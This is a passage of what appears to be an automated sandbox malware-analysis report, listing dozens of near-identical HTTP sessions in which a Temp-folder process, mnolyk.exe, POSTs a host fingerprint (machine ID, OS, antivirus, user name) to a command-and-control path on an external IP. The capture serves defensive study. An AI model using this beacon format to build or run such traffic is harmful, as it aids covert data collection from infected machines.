                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    536         192.168.2.3  50239        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:54.923460960 CET  735                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.986309052 CET  736                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    537         192.168.2.3  50240        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:55.156611919 CET  736                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.221343040 CET  737                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    538         192.168.2.3  50241        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:55.394284010 CET  737                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.458506107 CET  738                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    539         192.168.2.3  50242        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:55.637495041 CET  738                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.700236082 CET  739                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    54          192.168.2.3  49756        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:31:30.104619026 CET  255                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.170248985 CET  255                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    540         192.168.2.3  50243        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:55.883469105 CET  739                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.948122025 CET  740                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    541         192.168.2.3  50244        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:56.124936104 CET  740                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.189805984 CET  741                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    542         192.168.2.3  50245        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:56.364181042 CET  741                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.427768946 CET  742                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    543         192.168.2.3  50246        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:56.596900940 CET  742                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.662391901 CET  743                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    544         192.168.2.3  50247        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:56.859618902 CET  743                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.923338890 CET  744                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    545         192.168.2.3  50248        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:57.096615076 CET  744                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.161145926 CET  745                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    546         192.168.2.3  50249        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:57.332963943 CET  745                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.396867037 CET  746                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    547         192.168.2.3  50250        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:57.566354036 CET  746                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.658190966 CET | 747 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    548 | 192.168.2.3 | 50251 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:57.847161055 CET | 747 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.927674055 CET | 748 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    549 | 192.168.2.3 | 50252 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:58.095925093 CET | 748 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.160579920 CET | 749 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    55 | 192.168.2.3 | 49757 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:30.341809034 CET | 256 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.403728008 CET | 256 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    550 | 192.168.2.3 | 50253 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:58.330621958 CET | 749 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.394375086 CET | 750 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    551 | 192.168.2.3 | 50254 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:58.565095901 CET | 750 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.629164934 CET | 751 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    552 | 192.168.2.3 | 50255 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:58.840938091 CET | 751 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.905013084 CET | 752 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
